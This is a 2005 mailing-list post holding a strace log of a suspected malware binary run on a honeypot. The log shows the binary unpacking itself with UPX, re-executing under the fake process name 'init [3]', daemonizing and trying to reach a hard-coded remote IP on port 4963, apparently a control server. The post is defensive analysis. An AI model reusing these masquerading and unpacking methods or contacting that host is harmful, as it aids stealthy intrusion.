On Tue, 21 Jun 2005 20:32:14 +0200
Olaf Rempel <[EMAIL PROTECTED]> wrote:
> Executed on a honeypot and traced with strace (full strace attached):
*sigh*
[EMAIL PROTECTED] /tmp# strace -fF ./bla
execve("./bla", ["./bla"], [/* 22 vars */]) = 0
getpid() = 526
open("/proc/526/exe", O_RDONLY) = 3
lseek(3, 1508, SEEK_SET) = 1508
read(3, "\26\246\216X\344<\0\0\344<\0\0", 12) = 12
gettimeofday({1119378022, 214458}, NULL) = 0
unlink("/tmp/upxAXG0XDQAAQO") = -1 ENOENT (No such file or directory)
open("/tmp/upxAXG0XDQAAQO", O_WRONLY|O_CREAT|O_EXCL, 0700) = 4
ftruncate(4, 15588) = 0
old_mmap(NULL, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40000000
read(3, "\344<\0\0r\36\0\0", 8) = 8
read(3, "\177?d\371\177ELF\1\0\2\0\3\0\r\340\221\4\375o\263\335"..., 7794) =
7794
write(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\340\221"..., 15588) =
15588
read(3, "\0\0\0\0UPX!", 8) = 8
munmap(0x40000000, 20480) = 0
close(4) = 0
close(3) = 0
open("/tmp/upxAXG0XDQAAQO", O_RDONLY) = 3
access("/proc/526/fd/3", R_OK|X_OK) = 0
unlink("/tmp/upxAXG0XDQAAQO") = 0
fcntl(3, F_SETFD, FD_CLOEXEC) = 0
execve("/proc/526/fd/3", ["./bla"], [/* 22 vars */]) = 0
brk(0) = 0x804dba4
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=12266, ...}) = 0
old_mmap(NULL, 12266, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40016000
close(3) = 0
open("/lib/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360Y\1"..., 1024) =
1024
fstat64(3, {st_mode=S_IFREG|0755, st_size=1262160, ...}) = 0
old_mmap(NULL, 1243008, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40019000
mprotect(0x40142000, 26496, PROT_NONE) = 0
old_mmap(0x40142000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x128000) = 0x40142000
old_mmap(0x40146000, 10112, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40146000
close(3) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40149000
munmap(0x40016000, 12266) = 0
brk(0) = 0x804dba4
brk(0x804eba4) = 0x804eba4
brk(0) = 0x804eba4
brk(0x804f000) = 0x804f000
open("/dev/urandom", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFCHR|0644, st_rdev=makedev(1, 9), ...}) = 0
ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffffa40) = -1 EINVAL (Invalid
argument)
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
read(3, "\22G\257\344\6dW\23i\236\2753\10\331\364I0?\0057\301\37"..., 4096) =
4096
close(3) = 0
munmap(0x40016000, 4096) = 0
open("/var/run/ehttpd.pid", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/dev/null", O_RDONLY|O_NONBLOCK|O_DIRECTORY) = -1 ENOTDIR (Not a
directory)
open("/proc", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
fcntl64(3, F_SETFD, FD_CLOEXEC) = 0
getuid32() = 0
getpid() = 526
getdents64(3, /* 35 entries */, 1024) = 1024
getdents64(3, /* 19 entries */, 1024) = 456
stat64("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/1/cmdline", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
read(4, "init [3]\0\0\0\0\0\0\0\0\0\0\0\0", 8192) = 20
read(4, "", 8192) = 0
close(4) = 0
munmap(0x40016000, 4096) = 0
close(3) = 0
execve("/proc/self/exe", ["init [3]"], [/* 23 vars */]) = 0
brk(0) = 0x804dba4
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=12266, ...}) = 0
old_mmap(NULL, 12266, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40016000
close(3) = 0
open("/lib/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360Y\1"..., 1024) =
1024
fstat64(3, {st_mode=S_IFREG|0755, st_size=1262160, ...}) = 0
old_mmap(NULL, 1243008, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40019000
mprotect(0x40142000, 26496, PROT_NONE) = 0
old_mmap(0x40142000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x128000) = 0x40142000
old_mmap(0x40146000, 10112, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40146000
close(3) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40149000
munmap(0x40016000, 12266) = 0
brk(0) = 0x804dba4
brk(0x804eba4) = 0x804eba4
brk(0) = 0x804eba4
brk(0x804f000) = 0x804f000
open("/dev/urandom", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFCHR|0644, st_rdev=makedev(1, 9), ...}) = 0
ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffffa30) = -1 EINVAL (Invalid
argument)
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
read(3, "\177M\342\\\177=CV\273\216v\225\253\241\322J\346Z\273\340"..., 4096) =
4096
close(3) = 0
munmap(0x40016000, 4096) = 0
open("/var/run/ehttpd.pid", O_RDONLY) = -1 ENOENT (No such file or directory)
unlink("init [3]") = -1 ENOENT (No such file or directory)
rt_sigaction(SIGALRM, {0x80499d4, [ALRM], SA_RESTORER|SA_RESTART, 0x400425f8},
{SIG_DFL}, 8) = 0
rt_sigaction(SIGPIPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {0x80499a4, [CHLD], SA_RESTORER|SA_RESTART, 0x400425f8},
{SIG_DFL}, 8) = 0
fork(Process 527 attached (waiting for parent)
Process 527 resumed (parent 526 ready)
) = 527
[pid 527] close(1075075508 <unfinished ...>
[pid 526] exit_group(0) = ?
[pid 527] <... close resumed> ) = -1 EBADF (Bad file descriptor)
open("/dev/null", O_RDONLY) = 3
dup2(3, 0) = 0
dup2(3, 1) = 1
dup2(3, 2) = 2
open("/var/run/ehttpd.pid", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
getpid() = 527
fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
write(4, "527", 3) = 3
close(4) = 0
munmap(0x40016000, 4096) = 0
chdir("/") = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
gettimeofday({1119378022, 370028}, NULL) = 0
getpid() = 527
open("/etc/resolv.conf", O_RDONLY) = 5
fstat64(5, {st_mode=S_IFREG|0644, st_size=81, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
read(5, "search lan\n#nameserver 127.0.0.1"..., 4096) = 81
read(5, "", 4096) = 0
close(5) = 0
munmap(0x40016000, 4096) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(4963),
sin_addr=inet_addr("210.169.91.66")}, 16) = -1 ECONNREFUSED (Connection refused)
close(4) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {0x80499a4, [CHLD], SA_RESTORER|SA_RESTART,
0x400425f8}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
nanosleep({30, 0}, <unfinished ...>
Process 527 detached
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
